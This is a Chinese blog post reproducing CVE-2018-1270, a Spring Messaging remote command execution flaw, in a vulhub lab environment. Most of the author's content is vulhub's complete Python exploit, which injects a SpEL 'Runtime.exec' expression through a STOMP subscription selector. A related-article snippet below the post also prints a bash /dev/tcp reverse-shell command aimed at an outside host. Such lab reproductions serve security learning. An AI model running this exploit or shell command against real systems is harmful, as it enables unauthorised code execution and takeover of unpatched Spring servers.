vulhub-Spring Messaging 远程命令执行漏洞(CVE-2018-1270)

最新推荐文章于 2024-01-23 16:40:55 发布
最新推荐文章于 2024-01-23 16:40:55 发布
阅读量444 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42513429/article/details/119831639
版权

https://vulhub.org/#/environments/spring/CVE-2018-1270/

根据官方的说法,应用的场景各不相同,官方的exp代码还是很容易看懂的

1、基础地址,在vulhub中为http://your-ip:8080/gs-guide-websocket
2、待执行的SpEL表达式,如T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')
3、某一个订阅的地址,如vulhub中为:/topic/greetings
4、如何触发这个订阅,即如何让后端向这个订阅发送消息。在vulhub中,我们向/app/hello发送一个包含name的json,即可触发这个事件。当然在实战中就不同了,所以这个poc并不具有通用性。

粘贴上官方的exp

https://github.com/vulhub/vulhub/blob/master/spring/CVE-2018-1270/exploit.py

#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time()*1000)

    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)
    
    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']

        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
        
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])

        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://your-ip:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')",
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

运行起系统
在这里插入图片描述

无脑exp

在这里插入图片描述
在这里插入图片描述

反弹shell

在这里插入图片描述

在这里插入图片描述

要说原理自己还真不太清晰,先做复现吧

sillyboy_lch
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
spring-messaging-4.3.20.RELEASE-API文档-中英对照版.zip
04-07
赠送jar包:spring-messaging-4.3.20.RELEASE.jar 赠送原API文档:spring-messaging-4.3.20.RELEASE-javadoc.jar 赠送源代码:spring-messaging-4.3.20.RELEASE-sources.jar 包含翻译后的API文档:spring-...
Spring Messaging 远程命令执行漏洞CVE-2018-1270)
黑白的博客
12-20 1187
声明 好好学习,天天向上 漏洞描述 spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS, 在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞。 影响范围 Spring Framework 5.0 to 5.0.4. Spring Framework 4.3 to 4.3.14 已不支持的旧版
Spring-Messaging远程代码执行漏洞复现(CVE-2018-1270)
qq_59741143的博客
08-16 834
Spring-Messaging远程代码执行漏洞复现(CVE-2018-1270) Spring框架中通过spring-messaging模块来实现STOMP(Simple Text-Orientated Messaging Protocol),STOMP是一种封装WebSocket的简单消息协议。攻击者可以通过建立WebSocket连接并发送一条SpEL表达式消息造成远程代码执行。...
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270)
mole_exp的博客
02-26 8098
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270)
Spring Messaging-远程命令执行漏洞CVE-2018-1270)
qq_43381463的博客
04-19 411
spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用`StandardEvaluationContext`解析,造成命令执行漏洞
spring-messaging-5.0.8.RELEASE-API文档-中文版.zip
06-26
赠送jar包:spring-messaging-5.0.8.RELEASE.jar; 赠送原API文档:spring-messaging-5.0.8.RELEASE-javadoc.jar; 赠送源代码:spring-messaging-5.0.8.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-...
spring-framework-5.0.5.RELEASE 漏洞修复
04-11
spring-messaging模块远程代码执行CVE-2018-1270) STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它允许STOMP客户端与任意STOMP消息代理(Broker)进行交互。Spring框架中的...
spring-messaging-4.3.12.RELEASE-API文档-中英对照版.zip
07-11
赠送jar包:spring-messaging-4.3.12.RELEASE.jar; 赠送原API文档:spring-messaging-4.3.12.RELEASE-javadoc.jar; 赠送源代码:spring-messaging-4.3.12.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-...
spring-messaging-4.3.20.RELEASE-API文档-中文版.zip
04-08
赠送jar包:spring-messaging-4.3.20.RELEASE.jar; 赠送原API文档:spring-messaging-4.3.20.RELEASE-javadoc.jar; 赠送源代码:spring-messaging-4.3.20.RELEASE-sources.jar; 包含翻译后的API文档:spring-...
复现CVE-2018-1270——Spring Messaging 远程命令执行漏洞
记录并分享学习安全的知识点..
01-17 744
一、漏洞概述 spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞。 二、漏洞复现 发现页面如下: exp如下: x.x.x.x/gs-guide-websocket 我是用dnslog验证的: 用我的方法poc如..
vulhub复现之spring-messaging远程代码执行漏洞CVE-2018-1270)复现
m0_70483044的博客
07-15 1520
spring-messaging模块为集成messaging api和消息协议提供支持。spring框架中通过spring-messaging模块实现STOMP(Simple Text-Orientated Messaging Protocal)-面向消息的简单文本协议.STOMP是一种封装WebSocket连接并发一条消息造成远程代码执行。STOMP为浏览器和服务器之间的通信增加适当的消息语义。创建好环境我们看一下页面为啥有了http协议还需要webscket协议咧...
【vulhub】Spring Messaging 远程命令执行漏洞CVE-2018-1270)漏洞验证与getshell
qq_45300786的博客
08-01 727
利用条件 影响范围 Spring Framework 5.0 to 5.0.4. Spring Framework 4.3 to 4.3.14 已不支持的旧版本仍然受影响 详细过程请看 Spring Messaging 远程命令执行漏洞CVE-2018-1270) 对反弹shell的POC进行base64编码(java反弹shell都需要先编码,不然不会成功,原因貌似是runtime不支持管道符) bash -i >& /dev/tcp/192.168.100.23/9090 0>&a
SpringMessaging命令执行漏洞 cve-2018-1270
whatday的专栏
07-07 2249
漏洞概述 https://pivotal.io/security/cve-2018-1270 STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间件与客户端工具所支持。STOMP协议规范:https://stomp.github.io/stomp-specification-1.
spring-messaging远程代码执行漏洞CVE-2018-1270)复现
锋刃科技的博客
01-07 1479
漏洞概述 Spring框架中通过spring-messaging模块来实现STOMP(Simple Text-Orientated Messaging Protocol),STOMP是一种封装WebSocket的简单消息协议。攻击者可以通过建立WebSocket连接并发送一条消息造成远程代码执行 影响版本 Spring Framework 5.0 to 5.0.4 Spring Framework 4.3 to 4.3.14 环境搭建 拉取环境 docker ...
vulhub-Spring
bqnagus
10-03 323
vulhub-spring复现
vulhub之Spring篇
最新发布
weixin_56306210的博客
01-23 498
vulhub之Spring篇
Spring Messaging 远程命令执行漏洞 CVE-2018-1270 漏洞复现
ADummy的博客
03-02 988
Spring Messaging 远程命令执行漏洞CVE-2018-1270) by ADummy 0x00利用路线 ​ 订阅的时候插入SpEL表达式—>向此订阅发送消息—>触发命令执行 0x01漏洞介绍 ​ STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间
[Vulhub] Spring漏洞复现
weixin_45605352的博客
10-09 3153
Spring Security OAuth2 RCE(CVE-2016-4977) 0x00 漏洞描述 Spring Security OAuth 支持使用标准 Spring 和 Spring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。 在使用白标签视图进行错误处理时,远程攻击者可以通过 Springs 表达式语言 (SpEL) 构造恶意参数来执行命令。 0x01 影响版本 2.0.0 - 2.0.9 1.0.0 - 1.
org.springframework:spring-messaging:5.3.18 依赖
05-20
这是 Spring Framework 5.3.18 中的一个 Maven 依赖项,它提供了对 Spring Messaging 模块的支持。Spring Messaging 提供了基于消息的应用程序的支持,包括支持 STOMP(简单文本定向消息协议)和 WebSocket。它还...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值